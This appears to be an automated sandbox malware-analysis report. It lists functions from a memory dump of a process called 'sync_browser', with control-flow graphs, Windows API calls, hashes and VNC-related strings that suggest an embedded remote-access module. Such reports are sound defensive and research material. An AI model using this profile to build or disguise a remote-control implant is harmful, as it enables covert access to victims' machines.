                                                                    control_flow_graph 598 7ff6dc0c9d00-7ff6dc0c9d9b call 7ff6dc0c29a0 601 7ff6dc0c9db3-7ff6dc0c9dc7 OpenSCManagerA 598->601 602 7ff6dc0c9d9d 598->602 604 7ff6dc0c9de0-7ff6dc0c9e25 EnumServicesStatusA 601->604 605 7ff6dc0c9dc9-7ff6dc0c9dce 601->605 603 7ff6dc0c9da0-7ff6dc0c9db1 call 7ff6dc178894 602->603 603->601 609 7ff6dc0c9e2b-7ff6dc0c9e36 GetLastError 604->609 610 7ff6dc0c9fed-7ff6dc0c9ffc CloseServiceHandle 604->610 607 7ff6dc0c9dd0-7ff6dc0c9dd4 call 7ff6dc177914 605->607 608 7ff6dc0c9dd9-7ff6dc0c9ddb 605->608 607->608 613 7ff6dc0ca00b-7ff6dc0ca031 call 7ff6dc177220 608->613 609->610 614 7ff6dc0c9e3c-7ff6dc0c9e3f call 7ff6dc1771fc 609->614 615 7ff6dc0c9ffe-7ff6dc0ca002 call 7ff6dc177914 610->615 616 7ff6dc0ca007 610->616 621 7ff6dc0c9e44-7ff6dc0c9e4e 614->621 615->616 616->613 621->610 622 7ff6dc0c9e54-7ff6dc0c9e8d EnumServicesStatusA 621->622 623 7ff6dc0c9e93-7ff6dc0c9e9a 622->623 624 7ff6dc0c9fe5-7ff6dc0c9fe8 call 7ff6dc1778d4 622->624 623->624 625 7ff6dc0c9ea0 623->625 624->610 627 7ff6dc0c9ea3-7ff6dc0c9ea6 625->627 628 7ff6dc0c9fe1 627->628 629 7ff6dc0c9eac-7ff6dc0c9ec5 OpenServiceA 627->629 628->624 629->628 630 7ff6dc0c9ecb-7ff6dc0c9edf QueryServiceConfigA 629->630 631 7ff6dc0c9ee5-7ff6dc0c9eee GetLastError 630->631 632 7ff6dc0c9fc7-7ff6dc0c9fdb CloseServiceHandle 630->632 631->632 633 7ff6dc0c9ef4-7ff6dc0c9f02 call 7ff6dc1771fc 631->633 632->627 632->628 633->632 636 7ff6dc0c9f08-7ff6dc0c9f1e QueryServiceConfigA 633->636 637 7ff6dc0c9f24-7ff6dc0c9f8d call 7ff6dc0c29a0 call 7ff6dc0c9c80 call 7ff6dc0ca120 636->637 638 7ff6dc0c9fbf-7ff6dc0c9fc2 call 7ff6dc1778d4 636->638 646 7ff6dc0c9faf-7ff6dc0c9fb4 637->646 647 7ff6dc0c9f8f-7ff6dc0c9fa8 call 7ff6dc1785e0 637->647 638->632 646->638 649 7ff6dc0c9fb6-7ff6dc0c9fba call 7ff6dc177914 646->649 647->646 649->638
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
                                                                    • String ID:
                                                                    • API String ID: 3151975580-0
                                                                    • Opcode ID: 8382b389006a9dd66acb90cb8f4aaba53788da99cb30eaf76bcb58c2d1a1b507
                                                                    • Instruction ID: b5d494d346eac120e21ae7c83b43f19de3159273351ba402a6202baa725f5935
                                                                    • Opcode Fuzzy Hash: 8382b389006a9dd66acb90cb8f4aaba53788da99cb30eaf76bcb58c2d1a1b507
                                                                    • Instruction Fuzzy Hash: DE919F22B08A5589FB10DBA1D9047ED33B6BB487A8F400636DE2D97AD8DF39D527C350
                                                                    Function 00007FF6DC0E8590 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 165windowsynchronizationCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 344 7ff6dc0e8590-7ff6dc0e85de call 7ff6dc0c3730 347 7ff6dc0e85e0-7ff6dc0e85e9 344->347 348 7ff6dc0e862f-7ff6dc0e8639 344->348 351 7ff6dc0e8612-7ff6dc0e861c 347->351 352 7ff6dc0e85eb-7ff6dc0e860e SendMessageA WaitForSingleObject 347->352 349 7ff6dc0e8645-7ff6dc0e864f 348->349 350 7ff6dc0e863b-7ff6dc0e863e 348->350 355 7ff6dc0e8651-7ff6dc0e8656 call 7ff6dc178bf4 349->355 356 7ff6dc0e865d-7ff6dc0e8664 349->356 350->349 353 7ff6dc0e861e-7ff6dc0e8626 call 7ff6dc0d4110 351->353 354 7ff6dc0e8628 351->354 352->351 353->354 354->348 355->356 358 7ff6dc0e869b-7ff6dc0e86a5 356->358 359 7ff6dc0e8666-7ff6dc0e8688 call 7ff6dc0c3730 356->359 360 7ff6dc0e86b3-7ff6dc0e86bd 358->360 361 7ff6dc0e86a7-7ff6dc0e86ac call 7ff6dc1778d4 358->361 372 7ff6dc0e8694 359->372 373 7ff6dc0e868a-7ff6dc0e868d 359->373 365 7ff6dc0e86bf-7ff6dc0e86c4 call 7ff6dc1778d4 360->365 366 7ff6dc0e86cb-7ff6dc0e86d5 360->366 361->360 365->366 370 7ff6dc0e86dc-7ff6dc0e86e6 366->370 371 7ff6dc0e86d7 call 7ff6dc1778d4 366->371 376 7ff6dc0e86ed-7ff6dc0e86f7 370->376 377 7ff6dc0e86e8 call 7ff6dc1778d4 370->377 371->370 372->358 373->372 378 7ff6dc0e86fe-7ff6dc0e8704 376->378 379 7ff6dc0e86f9 call 7ff6dc1778d4 376->379 377->376 382 7ff6dc0e8706-7ff6dc0e870d 378->382 383 7ff6dc0e8757-7ff6dc0e8761 378->383 379->378 382->383 386 7ff6dc0e870f-7ff6dc0e8719 382->386 384 7ff6dc0e8763 call 7ff6dc178bf4 383->384 385 7ff6dc0e8768-7ff6dc0e8772 383->385 384->385 388 7ff6dc0e8774-7ff6dc0e8779 call 7ff6dc178bf4 385->388 389 7ff6dc0e877a-7ff6dc0e8782 385->389 390 7ff6dc0e871b-7ff6dc0e8723 386->390 391 7ff6dc0e8736-7ff6dc0e873e call 7ff6dc12a220 386->391 388->389 393 7ff6dc0e8784-7ff6dc0e878b call 7ff6dc177914 389->393 394 7ff6dc0e8790-7ff6dc0e87b3 389->394 390->383 402 7ff6dc0e8725-7ff6dc0e8734 390->402 391->383 404 7ff6dc0e8740-7ff6dc0e8751 SendMessageA 391->404 393->394 399 7ff6dc0e87b5-7ff6dc0e87bb FreeLibrary 394->399 400 7ff6dc0e87bc-7ff6dc0e87dc call 7ff6dc1778d4 * 2 394->400 399->400 409 7ff6dc0e87de-7ff6dc0e87e5 call 7ff6dc177914 400->409 410 7ff6dc0e87ea-7ff6dc0e8896 DeleteObject call 7ff6dc178bf4 DeleteObject call 7ff6dc178bf4 DeleteObject call 7ff6dc178bf4 DeleteObject call 7ff6dc178bf4 400->410 402->383 402->391 404->383 409->410
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
                                                                    • String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
                                                                    • API String ID: 2172171234-2418058073
                                                                    • Opcode ID: 7d6e0222f0b164888ec2c64f76faef887037f09de436063cfbd08819724c29b1
                                                                    • Instruction ID: a2f608b5caadb2b9a1fcc17bcf5cbc98ecbe4177a4b6736734ab5441f214654b
                                                                    • Opcode Fuzzy Hash: 7d6e0222f0b164888ec2c64f76faef887037f09de436063cfbd08819724c29b1
                                                                    • Instruction Fuzzy Hash: 33811735A09A9A85FB51DF25D8543AD2368FF84F94F080336CA6DCB695CF2AD466C310
                                                                    Function 00007FF6DC112FF0 Relevance: 27.2, APIs: 18, Instructions: 183windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1935883720-0
                                                                    • Opcode ID: b06cfa2c7c9d91227a6909707f994effb4396744763fd6e6bbb979b6844d4978
                                                                    • Instruction ID: 88cda81aa236fbb8e098f839506260d6a36bd5e33dbb98655bd071b4d61350ad
                                                                    • Opcode Fuzzy Hash: b06cfa2c7c9d91227a6909707f994effb4396744763fd6e6bbb979b6844d4978
                                                                    • Instruction Fuzzy Hash: 8061C561B08E6A82FB109B6AE84477D63A5EB89FA0F504132DE5E87B94DF3CD457C300
                                                                    Function 00007FF6DC1575C0 Relevance: 25.7, APIs: 17, Instructions: 151threadmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
                                                                    • String ID:
                                                                    • API String ID: 772457954-0
                                                                    • Opcode ID: e985c1ffb6018769c2b4a3bbbdc3cfbe5cf815ae3250197a8d1e99eeffc1a444
                                                                    • Instruction ID: b1b780ababbc9506a1d9bc2f90c4c745f12425d7c68259d87e632ec2112ec2ce
                                                                    • Opcode Fuzzy Hash: e985c1ffb6018769c2b4a3bbbdc3cfbe5cf815ae3250197a8d1e99eeffc1a444
                                                                    • Instruction Fuzzy Hash: B9615D35E2C76A86EB419F25AC4427D63A8FB44B84F100136EA4D877A5DF3CE467CB40
                                                                    Function 00007FF6DC0DF940 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 183COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 529 7ff6dc0df940-7ff6dc0df979 530 7ff6dc0df980-7ff6dc0df9ab 529->530 531 7ff6dc0df9b1-7ff6dc0df9cc call 7ff6dc177c50 530->531 532 7ff6dc0dfb19-7ff6dc0dfb25 530->532 538 7ff6dc0df9cf 531->538 533 7ff6dc0dfb29-7ff6dc0dfb42 call 7ff6dc177d30 532->533 539 7ff6dc0dfb44 533->539 540 7ff6dc0dfb50-7ff6dc0dfb69 call 7ff6dc177d30 533->540 541 7ff6dc0df9d1-7ff6dc0df9d3 538->541 539->530 543 7ff6dc0dfb49-7ff6dc0dfb4b 540->543 549 7ff6dc0dfb6b-7ff6dc0dfb95 call 7ff6dc178bbc 540->549 541->543 544 7ff6dc0df9d9-7ff6dc0df9e5 541->544 545 7ff6dc0dfc43-7ff6dc0dfc6d call 7ff6dc177220 543->545 547 7ff6dc0df9eb-7ff6dc0df9f4 544->547 548 7ff6dc0dfae6-7ff6dc0dfafc SleepEx 544->548 550 7ff6dc0dfaaa 547->550 551 7ff6dc0df9fa-7ff6dc0dfa02 547->551 556 7ff6dc0dfb02-7ff6dc0dfb04 548->556 549->543 564 7ff6dc0dfb97-7ff6dc0dfbf8 call 7ff6dc0c3730 549->564 557 7ff6dc0dfaaf-7ff6dc0dfab8 call 7ff6dc12d1f0 550->557 551->550 554 7ff6dc0dfa08-7ff6dc0dfa0f 551->554 559 7ff6dc0dfa11-7ff6dc0dfa34 554->559 560 7ff6dc0dfa39-7ff6dc0dfa44 554->560 561 7ff6dc0dfb12-7ff6dc0dfb14 556->561 562 7ff6dc0dfb06-7ff6dc0dfb0d 556->562 568 7ff6dc0dfabd-7ff6dc0dfac8 557->568 565 7ff6dc0dfaca-7ff6dc0dfae4 call 7ff6dc12d890 559->565 566 7ff6dc0dfa5e-7ff6dc0dfa9e EnterCriticalSection LeaveCriticalSection 560->566 567 7ff6dc0dfa46-7ff6dc0dfa5c 560->567 561->541 562->538 578 7ff6dc0dfc3e 564->578 579 7ff6dc0dfbfa-7ff6dc0dfc06 564->579 565->533 565->548 575 7ff6dc0dfaa4-7ff6dc0dfaa8 566->575 567->575 568->548 568->565 575->557 578->545 579->578 580 7ff6dc0dfc08-7ff6dc0dfc1d 579->580 580->578 582 7ff6dc0dfc1f-7ff6dc0dfc2c 580->582 582->578 583 7ff6dc0dfc2e-7ff6dc0dfc3a 582->583 583->578
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
                                                                    • String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s
                                                                    • API String ID: 958158500-3765181313
                                                                    • Opcode ID: 62d7a0d3994952fa3d98873a350cfe012e01e324e173516396c7741da241dfbd
                                                                    • Instruction ID: 15467a4516c8749efec5e164c2f4d2db8519af424b5c73a009dde0db2d64f75f
                                                                    • Opcode Fuzzy Hash: 62d7a0d3994952fa3d98873a350cfe012e01e324e173516396c7741da241dfbd
                                                                    • Instruction Fuzzy Hash: AD91C232608B9A86E760CB15E8587AD77A4FB88B94F404133EA4D87B94DF3DD56BC700
                                                                    Function 00007FF6DC129D80 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
                                                                    • String ID: ?
                                                                    • API String ID: 2900023865-1684325040
                                                                    • Opcode ID: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                    • Instruction ID: c5f1ae747162502b9093d8709b991f65b36e826cbc99f39ebf527bc77767c6b5
                                                                    • Opcode Fuzzy Hash: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                    • Instruction Fuzzy Hash: AD312C3560DB8985E7608B25F85536EB3A8FB8A784F000036DA8D87B58DF3DD026CB41
                                                                    Function 00007FF6DC0E80DA Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 189libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateRect$AddressLibraryLoadProcmalloc
                                                                    • String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...
                                                                    • API String ID: 1369618222-3178290357
                                                                    • Opcode ID: 35763fb2557c9489e4576fa8d485d6919a2073118b788ba794957893b6d6bdd5
                                                                    • Instruction ID: f7773984d6c0458902399e2ac32a3415461cd23273ef5c2284e00ed1d3211640
                                                                    • Opcode Fuzzy Hash: 35763fb2557c9489e4576fa8d485d6919a2073118b788ba794957893b6d6bdd5
                                                                    • Instruction Fuzzy Hash: BDB1E732625BE196E3488B24EA443DDB7ACF744B54F24422AE3A847B91DF7A6076C740
                                                                    Function 00007FF6DC157B50 Relevance: 10.6, APIs: 7, Instructions: 81threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
                                                                    • String ID:
                                                                    • API String ID: 1366308849-0
                                                                    • Opcode ID: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                    • Instruction ID: 8de4589f8b9abc4bd391949da3bd93d4b4f3aa8fea8a9f6565b857b55e2f9da2
                                                                    • Opcode Fuzzy Hash: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                    • Instruction Fuzzy Hash: D6314921E1C66B96EB118F24A8451BDB3B9FF85354F200237E65D826A9DF3CD46BCB40
                                                                    Function 00007FF6DC12CF90 Relevance: 9.1, APIs: 6, Instructions: 110networkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
                                                                    • String ID:
                                                                    • API String ID: 2120259006-0
                                                                    • Opcode ID: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                    • Instruction ID: 55d224835a029b668e41e0d1b215426d744cc4584734c6feca30c80942469886
                                                                    • Opcode Fuzzy Hash: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                    • Instruction Fuzzy Hash: C6512372604B85DEE7648F30D88429DB7A8FB4870CF004526EB5C87A58DF78D6A6CB54
